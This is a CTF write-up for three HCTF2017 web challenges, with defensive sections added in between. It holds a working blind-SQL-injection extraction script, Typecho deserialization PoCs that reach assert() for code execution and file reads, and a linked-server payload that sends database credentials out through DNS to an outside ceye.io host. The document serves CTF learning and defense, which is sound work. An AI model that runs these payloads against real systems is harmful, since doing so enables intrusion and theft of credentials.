
HCTF2017 partial web WP

Author: Shad0w_zz | Published 2018-11-26 21:03, read 0 times

SQL Silencer

SQL blind injection. I fuzzed it with my own crappy script and found a lot of things filtered: * space limit for ......
Using the payload constructed by Bai (白大佬), I wrote a blind-injection script:

#coding=UTF-8
# Python 2 script: boolean-based blind injection; %0d (carriage return) stands in for the filtered space
import requests
result = ''
url = 'http://sqls.2017.hctf.io/index/index.php'

# CASE WHEN <comparison> THEN (select 0) ELSE (select 1) END: a true comparison makes the page show "Alice"
payload = '?id=1%0d%3C%3E%0d(select%0dcase%0dwhen%0d(ascii(substring(({sql})from%0d{list}))={num})%0dthen%0d(select%0d0)%0delse%0d(select%0d1)%0dend)'

for i in xrange(0,50):          # character position
    for j in xrange(32,126):    # printable ASCII candidate
        # 0x256863746625 is the hex form of '%hctf%'
        hh = payload.format(sql='select%0dflag%0dfrom%0dhctf.flag%0dwhere%0dflag%0dlike%0d0x256863746625',list=str(i),num=str(j))
        #print hh
        zz = requests.get(url+hh)
        #print zz.content
        if 'Alice' in zz.content:
            result += chr(j)
            print result
            break
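A defender-side counterpart to the script above, added here and not part of the original write-up: it shows why a blocklist keyed on the literal space character never sees the %0d-separated probe, what a canonicalising check sees instead, and that binding the value as a query parameter makes the same text inert. The request string is constructed to match the payload's shape, and sqlite3 is an assumed stand-in for the challenge's MySQL backend.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed request in the shape the script above sends: %0d (carriage return) stands in
# for the filtered space, and 0x256863746625 is the hex form of '%hctf%'.
SAMPLE_REQUEST = (
    "/index/index.php?id=1%0d%3C%3E%0d(select%0dcase%0dwhen%0d(ascii(substring((select%0dflag"
    "%0dfrom%0dhctf.flag%0dwhere%0dflag%0dlike%0d0x256863746625)from%0d1))=104)"
    "%0dthen%0d(select%0d0)%0delse%0d(select%0d1)%0dend)"
)

# Tokens the challenge filter rejected, per the write-up.
BLOCKED_TOKENS = ("*", " ", "limit", "for")
# Shape of a boolean-based blind probe: CASE WHEN wrapped around an ASCII/SUBSTRING test.
BLIND_SIGNATURE = re.compile(r"case\s+when\s+\(?\s*ascii\s*\(\s*substr", re.IGNORECASE)

def analyze(raw_query_string):
    """Compare a literal-character blocklist with a canonicalising one on the same input."""
    decoded = unquote(raw_query_string)            # what PHP puts into $_GET['id']
    # Separator characters other than the plain space: how the payload dodges the check.
    odd_separators = sorted({c for c in decoded if c in "\r\n\t\x0b\x0c\x00"})
    # Fold comments and every whitespace/NUL run to one space before matching.
    canonical = re.sub(r"/\*.*?\*/|[\s\x00]+", " ", decoded).lower()
    return {
        "naive_filter_blocks": any(t in decoded.lower() for t in BLOCKED_TOKENS),
        "canonical_filter_blocks": any(t in canonical for t in BLOCKED_TOKENS),
        "odd_separators": odd_separators,
        "blind_probe": bool(BLIND_SIGNATURE.search(canonical)),
    }

def safe_lookup(user_input):
    """The actual fix: bind the value, so the CASE/SELECT text is data, never SQL.
    sqlite3 is an assumed stand-in for the challenge's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table items(id integer primary key, name text)")
    conn.execute("insert into items values (1, 'Alice')")
    return conn.execute("select name from items where id = ?", (user_input,)).fetchall()

if __name__ == "__main__":
    print(analyze(SAMPLE_REQUEST))
    print(safe_lookup("1"), safe_lookup("1\r<>\r(select 1)"))
```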

Dumped the database name hctf; the challenge gave the table name flag.
Because _ was filtered, the column names couldn't be queried; select count(1) showed the table has 2 fields.
Blindly guessed the column name was flag and verified it: select count(flag) returned correctly.
Fuzzy search: select flag from hctf.flag where flag like hex(%flag%)

At first I thought it was the flag; after all sorts of attempts I found it was a directory, but it returned 403.
So I started dumping the other field: select flag from hctf.flag where flag not like hex(%flag%)


At this point I got excited and tried the two paths every which way, then asked the challenge author, who said this wasn't a guessing game!
........
http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/index.php
I nearly coughed up blood........
A Typecho front-end deserialization vulnerability, but with no write permission, so only reading was possible.

PoC

<?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        // $this->_params['screenName'] = 'whoami';
        // double quotes inside the single-quoted string; nested single quotes would be a syntax error
        $this->_params['screenName'] = 'print_r(scandir("/"))';
        $this->_filter[0] = 'assert';
    }
}

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    /** ATOM 1.0 type */
    const ATOM1 = 'ATOM 1.0';
    /** RSS date format */
    const DATE_RFC822 = 'r';
    /** ATOM date format */
    const DATE_W3CDTF = 'c';
    /** line terminator */
    const EOL = "\n";
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this->_type = self::RSS2;
        $item['link'] = '1';
        $item['title'] = '2';
        $item['date'] = 1507720298;
        $item['author'] = new Typecho_Request();
        $item['category'] = array(new Typecho_Request());

        $this->_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'host' => 'localhost',
    'user' => 'xxxxxx',
    'charset' => 'utf8',
    'port' => '3306',
    'database' => 'typecho',
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>

Reference articles:
https://paper.seebug.org/424/
http://p0sec.net/index.php/archives/114/
And Dabai's PoC:

<?php
global $functionName;
global $evilParam;
$functionName = "assert";
$evilParam = "print_r(scandir('/'))";
$b = new Typecho_Feed();

$poc = array(
    "adapter" => $b,
    "prefix" => 1,
    );

$data = serialize($poc);
$config = unserialize($data);
echo base64_encode($data).PHP_EOL;

class Typecho_Request
{
    private $_params = array(
        "screenName" => "",
        "url" => "phpinfo");
    private $_filter = array();

    public function __construct()
    {
        global $functionName;
        global $evilParam;
        $this->_params['screenName'] = $evilParam;
        $this->_filter = array($functionName);
    }

}

class Typecho_Feed
{
    /** RSS 1.0 type */
    const RSS1 = 'RSS 1.0';

    /** RSS 2.0 type */
    const RSS2 = 'RSS 2.0';

    /** ATOM 1.0 type */
    const ATOM1 = 'ATOM 1.0';

    private $_type;

    const EOL = "\n";

    private $_items = array();
    public function __construct($version="1", $type = "ATOM 1.0", $charset = 'UTF-8', $lang = 'en')
    {
        $this->_version = $version;
        $this->_type = $type;
        $this->_charset = $charset;
        $this->_lang = $lang;
        $a = new Typecho_Request();
        $b = new Typecho_Request();
        $this->_items = array(array("author"=>$a,"category"=>array("name"=>$b)));
    }

}

Got the directory listing:

$this->_params['screenName'] = 'print_r(scandir("/"))';
$this->_filter[0] = 'assert';

Kept reading:

$functionName = "assert";
$evilParam = "print_r(scandir('/flag_is_here'))";

$functionName = "assert";
$evilParam = "print_r(file_get_contents('/flag_is_here/flag'))";
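An input check for the serialized config blob these PoCs produce, added as an example and not Typecho's own code: an install-time config should carry only scalars and arrays, so any `O:` object token, or a string naming a code-executing callable, is grounds to reject the `__typecho_config` value before it ever reaches unserialize(). The sample blob is constructed in the same shape (PHP prefixes private property names with "\0Class\0").

```python
import base64
import re
from urllib.parse import unquote

# Constructed blob in the shape the PoCs above emit (base64 of a serialized PHP array whose
# "adapter" slot holds an object; PHP prefixes private property names with "\0Class\0").
SAMPLE_CONFIG = base64.b64encode(
    b'a:2:{s:7:"adapter";O:15:"Typecho_Request":2:{'
    b's:24:"\x00Typecho_Request\x00_params";a:1:{s:10:"screenName";s:6:"whoami";}'
    b's:24:"\x00Typecho_Request\x00_filter";a:1:{i:0;s:6:"assert";}}'
    b's:6:"prefix";s:8:"typecho_";}'
).decode()
# A benign blob: scalars only, which is all an install-time config should ever carry.
BENIGN_CONFIG = base64.b64encode(
    b'a:2:{s:7:"adapter";s:5:"Mysql";s:6:"prefix";s:8:"typecho_";}').decode()

# O:<len>:"<class>":<n>:{  marks an object in PHP's serialization format.
OBJECT_TOKEN = re.compile(rb'O:(\d+):"([^"]*)":\d+:\{')
# Callables that turn a "filter" slot into code execution once applied to attacker text.
DANGEROUS = re.compile(
    rb's:\d+:"(assert|eval|system|exec|passthru|shell_exec|popen|proc_open'
    rb'|create_function|call_user_func|call_user_func_array)"', re.IGNORECASE)

def inspect_config(param_value):
    """Decode a __typecho_config-style value and report what a config must never contain."""
    try:
        raw = base64.b64decode(unquote(param_value), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"decodable": False, "classes": [], "callables": [], "reject": True}
    # Only count well-formed object tokens (declared length matches the class name).
    classes = [name.decode("latin-1") for length, name in OBJECT_TOKEN.findall(raw)
               if int(length) == len(name)]
    callables = sorted({c.decode().lower() for c in DANGEROUS.findall(raw)})
    return {"decodable": True, "classes": classes, "callables": callables,
            "reject": bool(classes) or bool(callables)}

if __name__ == "__main__":
    print(inspect_config(SAMPLE_CONFIG))
    print(inspect_config(BENIGN_CONFIG))
```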

boring website

A scan turned up www.zip, which contained index.php:

<?php
echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br />";
echo "flag is hctf{what you get}<br /><br />";
error_reporting(E_ALL^E_NOTICE^E_WARNING);

try {
   $conn = new PDO( "sqlsrv:Server=*****;Database=not_here","oob", ""); 
}

catch( PDOException $e ) {
   die( "Error connecting to SQL Server".$e->getMessage() ); 
}

#echo "Connected to MySQL<br />";
echo "Connected to SQL Server<br />";

$id = $_GET['id'];
if(preg_match('/EXEC|xp_cmdshell|sp_configure|xp_reg(.*)|CREATE|DROP|declare|insert|into|outfile|dumpfile|sleep|wait|benchmark/i', $id)) {
    die('NoNoNo');
}
$query = "select message from not_here_too where id = $id"; //link server: On  linkname:mysql

$stmt = $conn->query( $query ); 
while ( @$row = $stmt->fetch( PDO::FETCH_ASSOC ) ){
    //TO DO: ...
    //It's time to sleep...
}

?>

Since I hadn't done this one earlier,
it's said to be the command for SQL Server to reach MySQL through the linked server, then inject through it.
Reference article: http://bobao.360.cn/learning/detail/3458.html
Tool: http://ceye.io/records/dns
payload:
http://106.15.53.124:38324/?id=1; Select * from OpenQuery(mysql,'SELECT LOAD_FILE(CONCAT("\\\\",(select concat(id,name,password) from webwebweb.secret),".mysql.ip.port.xo2qpw.ceye.io\\abc"))');
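A detection for the exfiltration channel this payload relies on (the selected row leaves as the leftmost label of a name under the ceye domain, resolved by the database host when LOAD_FILE opens the UNC path), added here and not from the original write-up. The log format, host list and thresholds are constructed assumptions.

```python
import math
from collections import Counter

# Constructed DNS query log (simplified "timestamp client qname qtype" lines); the second
# line's qname carries a concatenated id/name/password as its leftmost label, the way the
# LOAD_FILE(CONCAT("\\\\", ..., ".xo2qpw.ceye.io\\abc")) payload above would produce it.
SAMPLE_DNS_LOG = """\
2018-11-26T21:03:01 10.0.20.7 updates.internal.example A
2018-11-26T21:03:02 10.0.20.7 1adminP4ssw0rdS3cr3tV4lue.mysql.ip.port.xo2qpw.ceye.io A
2018-11-26T21:03:03 10.0.30.15 www.example.org A
2018-11-26T21:03:04 10.0.20.7 db-backup.internal.example A
"""

DB_SERVERS = {"10.0.20.7"}               # assumed: database hosts, which need no external DNS
INTERNAL_SUFFIXES = (".internal.example",)
MAX_LABEL = 24                           # genuine hostnames rarely have labels this long
MAX_ENTROPY = 3.5                        # bits per character; mixed-case/digit blobs sit above

def shannon_entropy(text):
    """Bits per character of a label; encoded secrets look far more random than words."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values())

def analyze_dns_log(log_text):
    """Return one finding per query line that shows signs of DNS-carried exfiltration."""
    findings = []
    for line in log_text.splitlines():
        _ts, client, qname, _qtype = line.split()
        first = qname.rstrip(".").split(".")[0]
        reasons = []
        if client in DB_SERVERS and not qname.endswith(INTERNAL_SUFFIXES):
            reasons.append("db-host-external-lookup")
        if len(first) > MAX_LABEL:
            reasons.append("long-label")
        if shannon_entropy(first) > MAX_ENTROPY:
            reasons.append("high-entropy-label")
        if reasons:
            findings.append({"client": client, "qname": qname, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in analyze_dns_log(SAMPLE_DNS_LOG):
        print(finding)
```

The underlying fix on the application side is to bind $id in a PDO prepared statement instead of interpolating it, and on the infrastructure side to deny the database host outbound DNS and SMB so a UNC path in LOAD_FILE has nowhere to go.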


Article link: https://www.haomeiwen.com/subject/fwkcvftx.html